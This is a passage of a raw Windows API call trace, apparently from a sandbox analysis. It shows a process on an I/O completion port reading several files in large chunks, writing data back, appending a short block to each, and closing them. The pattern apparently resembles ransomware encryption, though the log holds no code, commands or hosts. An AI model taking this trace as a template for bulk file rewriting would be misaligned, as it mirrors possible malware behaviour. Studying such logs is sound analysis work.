lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 0 [0156.420] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4790020) returned 1 [0156.420] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.420] WriteFile (in: hFile=0x630, lpBuffer=0x2910094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x2910020 | out: lpBuffer=0x2910094*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x2910020) returned 1 [0156.420] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.420] WriteFile (in: hFile=0x66c, lpBuffer=0x41f0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0094*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x41f0020) returned 1 [0156.420] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.420] WriteFile (in: hFile=0x67c, lpBuffer=0x4670094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4670020 | out: lpBuffer=0x4670094*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4670020) returned 1 [0156.420] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.420] WriteFile (in: hFile=0x65c, lpBuffer=0x4790094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4790020 | out: lpBuffer=0x4790094*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4790020) returned 1 [0156.421] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.421] CloseHandle (hObject=0x630) returned 1 [0156.421] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2910020) returned 1 [0156.422] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.422] CloseHandle (hObject=0x66c) returned 1 [0156.423] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x41f0020) returned 1 [0156.423] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.423] CloseHandle (hObject=0x67c) returned 1 [0156.425] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4670020) returned 1 [0156.425] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.425] CloseHandle (hObject=0x65c) returned 1 [0156.426] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4790020) returned 1 [0156.426] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.835] ReadFile (in: hFile=0x67c, lpBuffer=0x2910124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x2910020 | out: lpBuffer=0x2910124*, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x2910020) returned 1 [0156.835] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.835] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x41f0020) returned 1 [0156.835] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.835] ReadFile (in: hFile=0x630, lpBuffer=0x4670124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124*, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x4670020) returned 1 [0156.836] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.836] ReadFile (in: hFile=0x134, lpBuffer=0x4790124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x4790020 | out: lpBuffer=0x4790124*, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x4790020) returned 1 [0156.836] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.836] ReadFile (in: hFile=0x2e0, lpBuffer=0x48b0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x48b0020 | out: lpBuffer=0x48b0124*, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x48b0020) returned 1 [0156.836] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.836] ReadFile (in: hFile=0x640, lpBuffer=0x49d0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x49d0020 | out: lpBuffer=0x49d0124*, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x49d0020) returned 1 [0156.837] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.837] ReadFile (in: hFile=0x644, lpBuffer=0x4af0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x4af0020 | out: lpBuffer=0x4af0124*, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x4af0020) returned 1 [0156.837] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.837] ReadFile (in: hFile=0x670, lpBuffer=0x4c10124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x4c10020 | out: lpBuffer=0x4c10124*, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x4c10020) returned 1 [0156.838] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.838] WriteFile (in: hFile=0x67c, lpBuffer=0x2910124*, nNumberOfBytesToWrite=0x17ff, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x2910020 | out: lpBuffer=0x2910124*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x2910020) returned 1 [0156.838] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.838] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x684d, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x41f0020) returned 1 [0156.838] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.839] WriteFile (in: hFile=0x630, lpBuffer=0x4670124*, nNumberOfBytesToWrite=0x11a5b, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4670020) returned 1 [0156.839] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.839] WriteFile (in: hFile=0x134, lpBuffer=0x4790124*, nNumberOfBytesToWrite=0xe051, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4790020 | out: lpBuffer=0x4790124*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4790020) returned 1 [0156.839] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.839] WriteFile (in: hFile=0x2e0, lpBuffer=0x48b0124*, nNumberOfBytesToWrite=0x2caf, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x48b0020 | out: lpBuffer=0x48b0124*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x48b0020) returned 1 [0156.840] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.840] WriteFile (in: hFile=0x640, lpBuffer=0x49d0124*, nNumberOfBytesToWrite=0x15944, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x49d0020 | out: lpBuffer=0x49d0124*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x49d0020) returned 1 [0156.840] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.840] WriteFile (in: hFile=0x644, lpBuffer=0x4af0124*, nNumberOfBytesToWrite=0x984, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4af0020 | out: lpBuffer=0x4af0124*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4af0020) returned 1 [0156.840] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.841] WriteFile (in: hFile=0x670, lpBuffer=0x4c10124*, nNumberOfBytesToWrite=0x17aa9, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4c10020 | out: lpBuffer=0x4c10124*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4c10020) returned 1 [0156.841] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.841] ReadFile (in: hFile=0x67c, lpBuffer=0x2910124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x2910020 | out: lpBuffer=0x2910124, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x2910020) returned 0x0 [0156.842] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.842] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x41f0020) returned 0x0 [0156.842] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.842] ReadFile (in: hFile=0x630, lpBuffer=0x4670124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x4670020) returned 0x0 [0156.842] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.842] ReadFile (in: hFile=0x134, lpBuffer=0x4790124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x4790020 | out: lpBuffer=0x4790124, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x4790020) returned 0x0 [0156.842] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.842] ReadFile (in: hFile=0x2e0, lpBuffer=0x48b0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x48b0020 | out: lpBuffer=0x48b0124, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x48b0020) returned 0x0 [0156.842] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.842] ReadFile (in: hFile=0x640, lpBuffer=0x49d0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x49d0020 | out: lpBuffer=0x49d0124, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x49d0020) returned 0x0 [0156.842] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.842] ReadFile (in: hFile=0x644, lpBuffer=0x4af0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x4af0020 | out: lpBuffer=0x4af0124, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x4af0020) returned 0x0 [0156.842] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.842] ReadFile (in: hFile=0x670, lpBuffer=0x4c10124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x4c10020 | out: lpBuffer=0x4c10124, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x4c10020) returned 0x0 [0156.843] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 0 [0156.843] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2910020) returned 1 [0156.843] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 0 [0156.843] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x41f0020) returned 1 [0156.843] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 0 [0156.843] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4670020) returned 1 [0156.843] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 0 [0156.843] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4790020) returned 1 [0156.843] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 0 [0156.843] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x48b0020) returned 1 [0156.843] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 0 [0156.843] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x49d0020) returned 1 [0156.843] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 0 [0156.843] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4af0020) returned 1 [0156.843] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 0 [0156.843] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4c10020) returned 1 [0156.843] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.843] WriteFile (in: hFile=0x67c, lpBuffer=0x2910094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x2910020 | out: lpBuffer=0x2910094*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x2910020) returned 1 [0156.843] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.844] WriteFile (in: hFile=0x610, lpBuffer=0x41f0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0094*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x41f0020) returned 1 [0156.844] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.844] WriteFile (in: hFile=0x630, lpBuffer=0x4670094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4670020 | out: lpBuffer=0x4670094*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4670020) returned 1 [0156.844] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.844] WriteFile (in: hFile=0x134, lpBuffer=0x4790094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4790020 | out: lpBuffer=0x4790094*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4790020) returned 1 [0156.844] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.844] WriteFile (in: hFile=0x2e0, lpBuffer=0x48b0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x48b0020 | out: lpBuffer=0x48b0094*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x48b0020) returned 1 [0156.844] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.844] WriteFile (in: hFile=0x640, lpBuffer=0x49d0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x49d0020 | out: lpBuffer=0x49d0094*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x49d0020) returned 1 [0156.844] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.844] WriteFile (in: hFile=0x644, lpBuffer=0x4af0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4af0020 | out: lpBuffer=0x4af0094*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4af0020) returned 1 [0156.844] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.844] WriteFile (in: hFile=0x670, lpBuffer=0x4c10094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4c10020 | out: lpBuffer=0x4c10094*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4c10020) returned 1 [0156.845] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.845] CloseHandle (hObject=0x67c) returned 1 [0156.845] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2910020) returned 1 [0156.846] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.846] CloseHandle (hObject=0x610) returned 1 [0156.853] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x41f0020) returned 1 [0156.853] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.853] CloseHandle (hObject=0x630) returned 1 [0156.854] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4670020) returned 1 [0156.854] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, 